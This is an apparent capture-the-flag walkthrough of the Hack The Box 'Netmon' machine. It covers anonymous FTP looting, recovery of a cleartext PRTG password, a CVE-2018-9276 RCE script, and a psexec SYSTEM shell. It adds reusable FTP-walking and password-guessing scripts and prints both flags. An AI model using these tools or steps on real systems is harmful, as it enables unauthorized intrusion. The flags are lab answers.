# Netmon - Easy

![Netmon](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F7m4T3FugFE6daD3yj9oa%2Fimage.png?alt=media\&token=24c77763-109c-425f-b013-990de24e1c56)

## Introduction@Netmon:~$

| Name         | [Netmon](https://app.hackthebox.com/machines/Netmon) |
| ------------ | ---------------------------------------------------- |
| IP           | 10.10.10.152                                         |
| OS           | Windows                                              |
| Points       | 20                                                   |
| Difficulty   | Easy                                                 |
| Creator      | [mrb3n](https://app.hackthebox.com/users/2984)       |
| Release Date | 02 March 2019                                        |

## Enumeration

### Nmap

```javascript
# Nmap 7.92 scan initiated Thu Dec 23 15:58:37 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.152
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.35s latency).
Not shown: 995 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-server-header: PRTG/18.1.37.13946
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-12-23T09:37:47
|_  start_date: 2021-12-23T09:36:30
|_clock-skew: mean: 8m49s, deviation: 0s, median: 8m49s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 23 15:59:03 2021 -- 1 IP address (1 host up) scanned in 26.48 seconds
```

`FTP` accepts `anonymous` logins (nmap's `ftp-anon` script already flagged it), so start there:

```javascript
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:sheinn101): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
12-23-21  05:20AM       <DIR>          Windows
226 Transfer complete.
ftp>
```

The listing is the root of the system drive, so the FTP site is rooted at `C:\`: an unauthenticated client can read anything the FTP service account can read, anywhere on the disk.

### Getting User.txt

```javascript
ftp> cd users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  10:44PM       <DIR>          Administrator
12-23-21  05:13AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
12-23-21  05:18AM                   94 tester.txt
12-23-21  04:37AM                   34 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
34 bytes received in 0.33 secs (0.0999 kB/s)
ftp> exit
221 Goodbye.
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ cat user.txt 
f876bb779c4439a08f27e9b0404e6fb5
```

The user flag comes straight out of anonymous FTP, with no exploitation at all.
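Since the whole drive is exposed, it is worth automating the walk instead of clicking through directories by hand. The script below is an added example, not part of the original writeup: it parses the MS-DOS style `LIST` output Microsoft ftpd returns (the format in the listings above), walks every directory the server will list, and flags files that look like flags or configuration. One caveat a manual `dir` hides: directories that are hidden on Windows, such as `ProgramData`, are not returned by `LIST` at all, so the script also probes a short list of known paths by name (only the PRTG path is confirmed on this page; the `INTERESTING` pattern, the `SKIP_DIRS` choice and the forward-slash paths are assumptions for the example).

```python
import ftplib
import re
import sys
from dataclasses import dataclass
from datetime import datetime
from typing import Iterable, Iterator, List, Tuple

# One line of a Microsoft ftpd (MS-DOS style) LIST reply, as in the listings above:
#   02-25-19  09:15PM       <DIR>          inetpub
#   12-23-21  04:37AM                   34 user.txt
MSDOS_LINE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?:(?P<dir><DIR>)|(?P<size>\d+))\s+(?P<name>.+?)\s*$"
)

# File names worth pulling down; this pattern is an assumption for the example.
INTERESTING = re.compile(
    r"(user\.txt|root\.txt|\.bak$|\.old$|configuration|\.config$|\.xml$|\.ini$)", re.I
)

# Hidden directories never show up in LIST but can still be entered by name.
# Only the PRTG path is confirmed on the page; extend the list as needed.
HIDDEN_PROBES = ["/ProgramData/Paessler/PRTG Network Monitor"]

# Skipped during the recursive walk: huge and rarely holds loot (assumption).
SKIP_DIRS = {"Windows"}


@dataclass
class Entry:
    name: str
    is_dir: bool
    size: int
    mtime: datetime


def parse_msdos_listing(lines: Iterable[str]) -> List[Entry]:
    """Turn LIST output into entries; FTP status lines ("226 ...") are ignored."""
    entries = []
    for line in lines:
        m = MSDOS_LINE.match(line.rstrip("\r\n"))
        if not m:
            continue
        mtime = datetime.strptime(f"{m['date']} {m['time']}", "%m-%d-%y %I:%M%p")
        entries.append(Entry(m["name"], m["dir"] is not None, int(m["size"] or 0), mtime))
    return entries


def interesting_files(entries: Iterable[Entry]) -> List[Entry]:
    return [e for e in entries if not e.is_dir and INTERESTING.search(e.name)]


def walk(ftp: ftplib.FTP, path: str, max_depth: int = 3, depth: int = 0) -> Iterator[Tuple[str, Entry]]:
    """Yield (full_path, entry) for every file under path, recursing into listed dirs."""
    lines: List[str] = []
    try:
        ftp.cwd(path)            # absolute paths, so recursion never depends on cwd
        ftp.retrlines("LIST", lines.append)
    except ftplib.error_perm:
        return                   # not readable or does not exist
    for e in parse_msdos_listing(lines):
        full = f"{path.rstrip('/')}/{e.name}"
        if e.is_dir:
            if depth < max_depth and e.name not in SKIP_DIRS:
                yield from walk(ftp, full, max_depth, depth + 1)
        else:
            yield full, e


def enumerate_host(host: str) -> List[Tuple[str, int]]:
    """Anonymous login, walk the listed tree plus the hidden probes, return hits."""
    ftp = ftplib.FTP(host, timeout=15)
    ftp.login("anonymous", "anon@example.com")   # identity string, any value is accepted
    hits = []
    for root in ["/"] + HIDDEN_PROBES:
        for full, e in walk(ftp, root):
            if INTERESTING.search(e.name):
                hits.append((full, e.size))
    ftp.quit()
    return hits


if __name__ == "__main__":
    for path, size in enumerate_host(sys.argv[1] if len(sys.argv) > 1 else "10.10.10.152"):
        print(f"{size:>10}  {path}")
```

Run it as `python3 ftpwalk.py 10.10.10.152`; it prints the size and path of each hit so the interesting ones can be fetched with `ftp`'s `get` as above. The depth cap and the `Windows` skip keep the walk short; drop them if you want the full tree.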

### Web

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2Ffr64iiufoncOgwGZ0Roi%2Fimage.png?alt=media\&token=dd960b53-c062-4019-aba8-d12f8f72a0d5)

Port 80 is the `PRTG Network Monitor (NETMON)` login page. The default credentials are `prtgadmin:prtgadmin`, but they do not work here, so the next step is to hunt for the real ones through the FTP access we already have.

PRTG keeps its configuration under `\ProgramData\Paessler\PRTG Network Monitor`. `ProgramData` is a hidden directory and did not appear in the root listing above, but the FTP server still lets you `cd` into it by name:

```javascript
ftp> cd "\ProgramData\Paessler\PRTG Network Monitor"
250 CWD command successful.
ftp> ls -al
200 PORT command successful.
150 Opening ASCII mode data connection.
12-15-21  07:23AM       <DIR>          Configuration Auto-Backups
12-23-21  04:36AM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
12-23-21  04:36AM       <DIR>          Logs (Web Server)
12-23-21  04:42AM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
12-23-21  05:18AM              1671248 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"
```

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F7PnvDIM37XjVOw3OpTdA%2Fimage.png?alt=media\&token=0a2320b2-5369-487b-8e03-d6172ebb017b)

```javascript
<dbpassword>
	<!-- User: prtgadmin -->
	PrTg@dmin2018
</dbpassword>
```

Try these credentials on the login page.

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FpV80TVb12dy2ukOtukUE%2Fimage.png?alt=media\&token=f8cdec32-bb18-4a7d-855c-90b5801eaee6)

They do not work. Look at the password again: `PrTg@dmin2018` ends in a year, and the file it came from is a stale backup (`PRTG Configuration.old.bak` is dated 07-14-18, while the live `PRTG Configuration.dat` is from 02-25-19). A password scheme like this is usually rolled forward each year, so the obvious guess is `PrTg@dmin2019`, and that one logs in.
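Both steps, pulling the cleartext `<dbpassword>` entries out of the backup and rolling the trailing year forward, are worth scripting so the same trick works on the next stale config you find. The block below is an added example, not code from the writeup or from Paessler: the parser is driven only by the fragment shown above (a `<!-- User: ... -->` comment followed by the cleartext value), the sample configuration in the test is constructed, and the `try_login` function assumes that PRTG's form POSTs `username`/`password` to `/public/checklogin.htm` and answers a good login with a redirect that sets the `OCTOPUS<id>` session cookie seen later in the exploit usage; that endpoint and field layout are not shown on this page.

```python
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import List, Optional, Tuple

# A <dbpassword> element as it appears in the backup above: an optional
# "User:" comment followed by the cleartext value.
DBPASSWORD = re.compile(
    r"<dbpassword>\s*(?:<!--\s*User:\s*(?P<user>[^>]*?)\s*-->)?\s*"
    r"(?P<pw>[^<\s][^<]*?)\s*</dbpassword>",
    re.S,
)

# "stem + four-digit year + non-digit suffix", e.g. PrTg@dmin2018 or Summer2019!
TRAILING_YEAR = re.compile(r"^(?P<stem>.*?)(?P<year>(?:19|20)\d{2})(?P<suffix>\D*)$")


def extract_credentials(config_text: str) -> List[Tuple[str, str]]:
    """Return (user, password) for every cleartext <dbpassword> in a PRTG config
    dump. Elements holding nested markup instead of a bare value do not match
    and are skipped, so only readable passwords come back."""
    return [(m["user"] or "?", m["pw"]) for m in DBPASSWORD.finditer(config_text)]


def year_variants(password: str, span: int = 3) -> List[str]:
    """Roll a trailing year forward: a backup from 2018 is stale, so the live
    password is likely the same scheme with a later year. Passwords without a
    trailing year are returned unchanged."""
    m = TRAILING_YEAR.match(password)
    if not m:
        return [password]
    start = int(m["year"])
    return [f"{m['stem']}{y}{m['suffix']}" for y in range(start, start + span)]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib following the post-login redirect so its Set-Cookie stays visible."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def try_login(base_url: str, username: str, password: str, timeout: int = 10) -> bool:
    """Assumption (not shown on the page): the login form POSTs
    loginurl/username/password to /public/checklogin.htm; success is a 302
    carrying an OCTOPUS<id> cookie, failure re-renders the form with 200."""
    data = urllib.parse.urlencode(
        {"loginurl": "/", "username": username, "password": password}
    ).encode()
    req = urllib.request.Request(
        f"{base_url.rstrip('/')}/public/checklogin.htm", data=data, method="POST"
    )
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        resp = opener.open(req, timeout=timeout)
    except urllib.error.HTTPError as err:   # the 302 surfaces here because redirects are blocked
        resp = err
    cookies = resp.headers.get_all("Set-Cookie") or []
    return resp.getcode() in (301, 302) and any(c.upper().startswith("OCTOPUS") for c in cookies)


def guess_login(base_url: str, config_text: str) -> Optional[Tuple[str, str]]:
    """Extract credentials from the backup and try each year-rolled variant in turn."""
    for user, pw in extract_credentials(config_text):
        for candidate in year_variants(pw):
            if try_login(base_url, user, candidate):
                return user, candidate
    return None


if __name__ == "__main__":
    import sys
    # Encoding of the .bak is assumed to be UTF-8 compatible; bad bytes are replaced.
    with open(sys.argv[2], encoding="utf-8", errors="replace") as fh:
        print(guess_login(sys.argv[1], fh.read()))
```

Usage is `python3 prtgcreds.py http://10.10.10.152 "PRTG Configuration.old.bak"`. Keep `span` small: three candidates per account is a targeted guess, not a brute force, and stays well under any lockout threshold the appliance might have.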

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F77tkBrEr3iNKnRmiFdZ4%2Fimage.png?alt=media\&token=010661c0-b62e-4f4d-af9a-b6f6799794dd)

## Getting Administrator

The PRTG version is shown at the bottom left of the page (nmap already reported it as `18.1.37.13946` on port 80). Search for exploits against that version.

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FMJCi8AaOYiotiXkIZLwm%2Fimage.png?alt=media\&token=dde557df-430a-48ac-96b6-a1c1c95427f6)

We will use this [Exploit-DB](https://www.exploit-db.com/exploits/46527) bash script, an authenticated RCE for CVE-2018-9276 that creates a local administrator, which is why the recovered `prtgadmin` credentials matter.

> <https://www.exploit-db.com/exploits/46527>

The file as downloaded has Windows (CRLF) line endings, so the shebang line ends in `\r` and the kernel looks for an interpreter named `/bin/bash^M`:

```javascript
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh 
-bash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$
```

Strip the carriage returns (`dos2unix 46527.sh` does the same) and it runs:

> sed -i -e 's/\r$//' 46527.sh

```javascript
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh 

[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] Date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] 
[*] Version: 18.2.38                                                        [*] 
[*] CVE: CVE-2018-9276                                                      [*] 
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+] 

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 

[+]#########################################################################[+] 
 EXAMPLE USAGE: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"
```

The script needs the session cookie of an authenticated `prtgadmin` session, the `OCTOPUS1813713946=...` value. Log in through the browser and copy the `Cookie` header from Burp (or from the browser's developer tools).

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2F04n5Foc2EpCDFC7YViog%2Fimage.png?alt=media\&token=105a3e4c-fb48-4a3c-be21-ad9da3e396a6)

```javascript
./46527.sh -u http://10.10.10.152 -c "_ga=GA1.2.2019227520.1640252936; _gid=GA1.2.125523594.1640252936; OCTOPUS1813713946=e0RGRUJCNzI0LTBDMzYtNDk5Q04QzIzLUY3ODVEODJFQjJDNX0%3D"
```

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FcNRh3pBKWIvgBc01VBCe%2Fimage.png?alt=media\&token=3c2f5db2-75dc-4a57-b848-9bd3ca3a39c0)

The exploit has created `pentest:P3nT3st!` in the local Administrators group. That is all `psexec.py` needs: it writes a service binary to `ADMIN$` and starts it through the Service Control Manager, which gives a shell as SYSTEM.

```javascript
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/psexec.py pentest:"P3nT3st!"@10.10.10.152
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file xHANHcvF.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service KSTQ on 10.10.10.152.....
[*] Starting service KSTQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 0EF5-E5E5

 Directory of c:\Users\Administrator\Desktop

02/02/2019  11:35 PM    <DIR>          .
02/02/2019  11:35 PM    <DIR>          ..
12/23/2021  04:37 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,758,518,784 bytes free

c:\Users\Administrator\Desktop>type root.txt
52a75d9617892bb0d16e610dbf2e8787
```

![](https://3759110756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVvHHLY2mrxd5y4e2vVYL%2Fuploads%2FF8DJirSFlv1Un7WBmtvu%2Fcomplete.gif?alt=media\&token=045fd197-4004-49f4-a8ed-ee28e197008f)

> <https://app.hackthebox.com/profile/237587>

## Resources

> <https://www.exploit-db.com/exploits/46527>
>
> <https://www.codewatch.org/blog/?p=453>
